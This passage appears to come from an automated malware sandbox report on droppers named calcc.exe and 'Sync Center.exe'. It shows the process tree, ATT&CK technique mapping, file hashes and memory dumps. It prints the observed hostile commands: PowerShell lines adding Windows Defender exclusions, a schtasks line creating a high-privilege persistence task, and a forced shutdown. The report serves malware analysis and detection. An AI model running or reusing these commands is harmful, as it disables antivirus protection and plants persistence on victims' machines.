        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3624
      - C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2984
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3452
    - - C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5020
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2968
    - - C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1860
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1240
  - - C:\Users\Admin\AppData\Local\Temp\calcc.exe
      "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1864
  - - C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
      "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3728
- - C:\Users\Admin\AppData\Local\Temp\calcc.exe
    "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4148
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2864
- - C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
    "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2544
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4476
- C:\Users\Admin\AppData\Local\Temp\calcc.exe
  "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3260
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'calcc.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\calc.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4444
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'calc.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1624
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "calc" /tr "C:\Users\Public\calc.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3068
- - C:\Windows\SYSTEM32\shutdown.exe
    shutdown.exe /f /s /t 0
    3⤵
    PID:4904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2944
- C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
  "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3332

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4880

C:\Users\Public\calc.exe
C:\Users\Public\calc.exe
1⤵
- Executes dropped EXE
PID:2632

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa385f855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1692

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Sync Center.exe.log

Filesize
1KB

MD5
d7e08a6cf500fe5ab87b41795962ee19

SHA1
dd08782055e3e72f7a8c14ee8a27953825b18c6a

SHA256
e74f68eef03565053effbbfb8a786c8858edea751f40cd8c1030ca673f6ba161

SHA512
d4d694cde80f00642174c564969c228ae69dd31707b8e9cf52b5564b98b34d1c20857fddfeff66b597bab150be18b8166425f6cc1001c6154ba77611f0bec4d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WaveInstaller.exe.log

Filesize
1KB

MD5
bb6a89a9355baba2918bb7c32eca1c94

SHA1
976c76dfbc072e405ce0d0b9314fe5b9e84cb1b2

SHA256
192fbb7f4d1396fd4846854c5472a60aa80932f3c754f2c2f1a2a136c8a6bb4b

SHA512
efdf0c6228c3a8a7550804ac921dfefc5265eb2c9bbf4b8b00cedd427c0a5adf610586b844ff444bd717abff138affcbe49632ce984cbffc5fa8019b4ba6ec0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\calcc.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
83685d101174171875b4a603a6c2a35c

SHA1
37be24f7c4525e17fa18dbd004186be3a9209017

SHA256
0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870

SHA512
005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
10890cda4b6eab618e926c4118ab0647

SHA1
1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

SHA256
00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

SHA512
a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d8cb3e9459807e35f02130fad3f9860d

SHA1
5af7f32cb8a30e850892b15e9164030a041f4bd6

SHA256
2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

SHA512
045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
34f595487e6bfd1d11c7de88ee50356a

SHA1
4caad088c15766cc0fa1f42009260e9a02f953bb

SHA256
0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

SHA512
10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
dbb22d95851b93abf2afe8fb96a8e544

SHA1
920ec5fdb323537bcf78f7e29a4fc274e657f7a4

SHA256
e1ee9af6b9e3bfd41b7d2c980580bb7427883f1169ed3df4be11293ce7895465

SHA512
16031134458bf312509044a3028be46034c544163c4ca956aee74d2075fbeb5873754d2254dc1d0b573ce1a644336ac4c8bd7147aba100bfdac8c504900ef3fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
67e8893616f805af2411e2f4a1411b2a

SHA1
39bf1e1a0ddf46ce7c136972120f512d92827dcd

SHA256
ca0dfe104c1bf27f7e01999fcdabc16c6400c3da937c832c26bdbca322381d31

SHA512
164e911a9935e75c8be1a6ec3d31199a16ba2a1064da6c09d771b2a38dd7fddd142301ef55d67d90f306d3a454a1ce7b72e129ea42e44500b9b8c623a8d98b4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
df67b5f44d42892c3aaf6dcb614c2a23

SHA1
eb009c4aee0fddcff7a39cf207bf2a38460ea7b4

SHA256
a0bb1f78cc41d835312c3dc97b65e088c9614f796a8ebe0d84ed8fc6db9a0fd7

SHA512
3f2a57a6e33846ba1fc7f7875bb858132cda073e1ec224847f6d714a530446e47e81427d1fb9204ac559f4d1c19b4e65bd3bc8188444bfc88cc80b68fac1ce92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4fb694429aed796793f760943b824594

SHA1
b0e00003b4cf55304e6b72f3f52bdf5b449be3d4

SHA256
443877624877e83313be3f63fd638de406a0dff3ca1bfa0c64c9af0d85da1ce5

SHA512
55c35506bb7b29e1fb47d3a519dac07551de072f89f034eafac6990f59bc591c80a5484fd2d6639b5673fad6a15a5e1769b3e8fc46d146ceed5207ea4e11865d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
0256bd284691ed0fc502ef3c8a7e58dc

SHA1
dcdf69dc8ca8bf068f65d20ef1563bbe283e2413

SHA256
e2fb83098e114084f51ed7187334f861ce670051046c39f338928296ca9a49cf

SHA512
c5b29c1e0a15ddb68b0579848066774fa7cdc6f35087bbbf47c05a5c0dcc1eb3e61b2ddadfbded8c1ed9820e637596a9f08a97db8fb18000d168e6b159060c42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22310ad6749d8cc38284aa616efcd100

SHA1
440ef4a0a53bfa7c83fe84326a1dff4326dcb515

SHA256
55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

SHA512
2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
53b097b8beec621cba9eb3ae650f7c34

SHA1
8bdf179119d0d1da07bae75d7b8c3ea494d4020f

SHA256
43df638d38a3487d9908f92bc12ba836ce933cdea5b4aa5fe4d276b03c1a6fe6

SHA512
e9cf91d94322afa20404a5aa62b66935d8f82a1f90e19ab563a836e195a0e496dc494d2320c91d8554bc0df0d8046ec873b2dedba365c52e9009e51f772015dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
15dde0683cd1ca19785d7262f554ba93

SHA1
d039c577e438546d10ac64837b05da480d06bf69

SHA256
d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

SHA512
57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
dd1d0b083fedf44b482a028fb70b96e8

SHA1
dc9c027937c9f6d52268a1504cbae42a39c8d36a

SHA256
cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c

SHA512
96bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b1a1d8b05525b7b0c5babfd80488c1f2

SHA1
c85bbd6b7d0143676916c20fd52720499c2bb5c6

SHA256
adad192fc86c2f939fd3f70cb9ad323139a4e100f7c90b4454e2c53bdbc9b705

SHA512
346c6513c1373bab58439e37d3f75de1c5c587d7eb27076cf696e885a027b3b38d70b585839d1a2e7f2270cdcf0dac8c1fdff799f3b1158242ae9e3364c2a06e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bdf48114c58625e31476a6fb6aa5095a

SHA1
eb495ab6d22d2747dd66d42bd9e97d9f2e0d44e1

SHA256
1b492aee1b0b755650a50df7ca12ab837d0dda9c8a9de81216ed0b36dde6fb0f

SHA512
11658e6f52f5186cdc3463d660969490d1cd5df03025c69d8c683ff412b1b5f3739a1d4d9c7da53a9c05732979ac2339a72342186401e6760207dc3980463b5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2c8160ec3a3eafbd440f5e35d0619265

SHA1
7cabd95efd574c6e5d6ad4299ba3357e9198d7ff

SHA256
08c60d1bcaa859b1b5ed350e9e165d1e9dbe537f38d041dca2ad8f8c2abbda5c

SHA512
5ebfbd705da46c13ca415c6f8953f6ef36f1eaf65cdece6124a3c39e440d4729d79e85e1419fb91214ebd68f2d14192b8af29989a2196d041ac54ceab8e66de4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0a40a2d16d62c60994d5bb5624a589b

SHA1
30f0a77f10518a09d83e6185d6c4cde23e4de8af

SHA256
c213a4024e89a0240d0b1fa3b18ea3db3db7bbe7ca1bdeed86dce9c2c4991ef8

SHA512
cecef5087f194a83948880e36445324406218f6877386d6db7850b8f97ac107e042ea9445bb7e73c6e6a2c7da9782b7dae8caba0a1c997677d096b3271a4cac0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cc19bcff372d20459d3651ba8aef50e7

SHA1
3c6f1d4cdd647864fb97a16b1aefba67fcee11f7

SHA256
366473e774d8976c7fd4dc582220666fb61a4feb3f7c95e69b2a68ad9e446ec9

SHA512
a0e360ca4b6e874fd44612bf4b17f3722c0619da4f6bade12a62efadae88c2d33460114eaafa2bc3fb1cef5bea07e745b8bee24f15d0cacaff5f4a521b225080

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9a2c763c5ff40e18e49ad63c7c3b0088

SHA1
4b289ea34755323fa869da6ad6480d8d12385a36

SHA256
517807921c55bd16cd8a8bfae3d5dc19444c66f836b66acd5593e3080acbaf8e

SHA512
3af01926bc7de92076067d158d7250b206d396b3282ee0db43639d04d91bd9ff763acbce12c7822914824984a3c5fdd1b8dbf1ad2ee88233d47f0f808b746bc8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e58749a7a1826f6ea62df1e2ef63a32b

SHA1
c0bca21658b8be4f37b71eec9578bfefa44f862d

SHA256
0e1f0e684adb40a5d0668df5fed007c9046137d7ae16a1f2f343b139d5f9bc93

SHA512
4cf45b2b11ab31e7f67fff286b29d50ed28cd6043091144c5c0f1348b5f5916ed7479cf985595e6f096b586ab93b4b5dce612f688049b8366a2dd91863e98b70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
07a771c4f31f62b2d04e2befaa36dce7

SHA1
662952ede6c1acbb575e8149a5ac2f08edade811

SHA256
a2df2570980e1123d9af8e12a27a82d3a4d332f0e7dd44e4e225743207c099b3

SHA512
9e339a2d0bfaf5bbe5252f69061652c5880fe1233930830ca7190a65516366e05129907b1656a6790c0093ad82ac73ddee6738d0b78ecb1e3d888f467b889fe9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c78dcf86a28841efe163982298c2e87e

SHA1
19760556eec41e7e2be4030576b7cd7b45cfdf24

SHA256
b02fbca028183a27971a8d02a5473fbcc2149048a23ab2a110a65206538cb858

SHA512
6a5bcb933c0d0eaa4b17a4a15e7b574913c3b8cc8c7a5080c30e57af90da21145a1e060e179f230dd24a25e4e972cdca7563aa956befa05d988d52ba4ccc0803

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
60945d1a2e48da37d4ce8d9c56b6845a

SHA1
83e80a6acbeb44b68b0da00b139471f428a9d6c1

SHA256
314b91c00997034d6e015f40230d90ebbf57de5dc938b62c1a214d591793dbe3

SHA512
5d068f1d6443e26ae3cad1c80f969e50e5860967b314153c4d3b6efd1cfa39f0907c6427bec7fa43db079f258b6357e4e9a1b0b1a36b1481d2049ea0e67909ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
10fb30dc297f99d6ebafa5fee8b24fa2

SHA1
76904509313a49a765edcde26b69c3a61f9fa225

SHA256
567bcacac120711fc04bf8e6c8cd0bff7b61e8ee0a6316254d1005ebb1264e6a

SHA512
c42ace1ea0923fa55592f4f486a508ea56997fdbe0200016b0fc16a33452fc28e4530129a315b3b3a5ede37a07097c13a0eb310c9e91e5d97bb7ce7b955b9498

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2b453e11296c30377ad61a79aaaa8028

SHA1
d24b574a09a27eafae2cb1f424152889c0626c50

SHA256
ecb67197af6883787011beb002c314c2cc8131bf324246e18bf9fc00a25cb29d

SHA512
5f6eb836692c95454f89b1f723a737a51554ca49dfd8e2b8b377a09bb36cb40c99b89f0d261e990a8a0a1011c816d22f25083b746a5030a2863cf9a8d87491fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3072fa0040b347c3941144486bf30c6f

SHA1
e6dc84a5bd882198583653592f17af1bf8cbfc68

SHA256
da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e

SHA512
62df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a7cc007980e419d553568a106210549a

SHA1
c03099706b75071f36c3962fcc60a22f197711e0

SHA256
a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165

SHA512
b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
eb1ad317bd25b55b2bbdce8a28a74a94

SHA1
98a3978be4d10d62e7411946474579ee5bdc5ea6

SHA256
9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

SHA512
d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ba169f4dcbbf147fe78ef0061a95e83b

SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Sync Center.exe

Filesize
121KB

MD5
7b6c19c2c8fc4ff9cc5b136f22cf490d

SHA1
e557a697a268c54a73aaffd02d25e54c4f601719

SHA256
cf6c9880812d48fe7ba3a1d1a1692a881745a7fb8cf6534f94555dd7dd1c3353

SHA512
afe23d16011e1eb71ce3be9f8796cf0398cc9e01415c93cd4e8403f1ee84f48e23396ab7709b60d5a9e5b3e5daee9e8f90bae99e6a85ece6475fa8bdd82f953b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1gre1s2l.fit.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\calcc.exe

Filesize
71KB

MD5
36686a659c023c60d85630ef9080ee34

SHA1
c26facc03073d700fc65af33eb2d8a6215f065b6

SHA256
eadd6fd65960900c14dd8e18a16348ec4c6f766e6316428f8cf659d02b43fb49

SHA512
236eab23ae8a565532ffd063a7e31ecc9aa835c63ca243c15ddba652f639dc5249589340812299e523156ac8695571877d1af78c2a481f0b2527d90aa00c3587

Download Submit
memory/1048-1276-0x000002AD38C10000-0x000002AD38D7A000-memory.dmp

Filesize
1.4MB

Download
memory/1064-1265-0x000001FCC5070000-0x000001FCC51DA000-memory.dmp

Filesize
1.4MB

Download
memory/1240-137-0x000002B5C6D00000-0x000002B5C6E6A000-memory.dmp

Filesize
1.4MB

Download
memory/1264-678-0x0000024C77680000-0x0000024C777EA000-memory.dmp

Filesize
1.4MB

Download
memory/1472-836-0x00000148669B0000-0x0000014866B1A000-memory.dmp

Filesize
1.4MB

Download
memory/1628-795-0x000001346A1A0000-0x000001346A30A000-memory.dmp

Filesize
1.4MB

Download
memory/1844-262-0x000001FA292B0000-0x000001FA2941A000-memory.dmp

Filesize
1.4MB

Download
memory/1864-250-0x000001F93B6E0000-0x000001F93B84A000-memory.dmp

Filesize
1.4MB

Download
memory/2016-710-0x000001689B770000-0x000001689B8DA000-memory.dmp

Filesize
1.4MB

Download
memory/2144-332-0x00000184AF7E0000-0x00000184AF94A000-memory.dmp

Filesize
1.4MB

Download
memory/2252-115-0x00000238BC800000-0x00000238BC96A000-memory.dmp

Filesize
1.4MB

Download
memory/2324-484-0x000002087C110000-0x000002087C27A000-memory.dmp

Filesize
1.4MB

Download
memory/2352-985-0x0000014FD67A0000-0x0000014FD690A000-memory.dmp

Filesize
1.4MB

Download
memory/2400-689-0x0000020722E10000-0x0000020722F7A000-memory.dmp

Filesize
1.4MB

Download
memory/2472-752-0x0000021527EF0000-0x000002152805A000-memory.dmp

Filesize
1.4MB

Download
memory/2612-848-0x0000029CD3AE0000-0x0000029CD3C4A000-memory.dmp

Filesize
1.4MB

Download
memory/2956-773-0x00000255360F0000-0x000002553625A000-memory.dmp

Filesize
1.4MB

Download
memory/3052-732-0x0000022752E50000-0x0000022752FBA000-memory.dmp

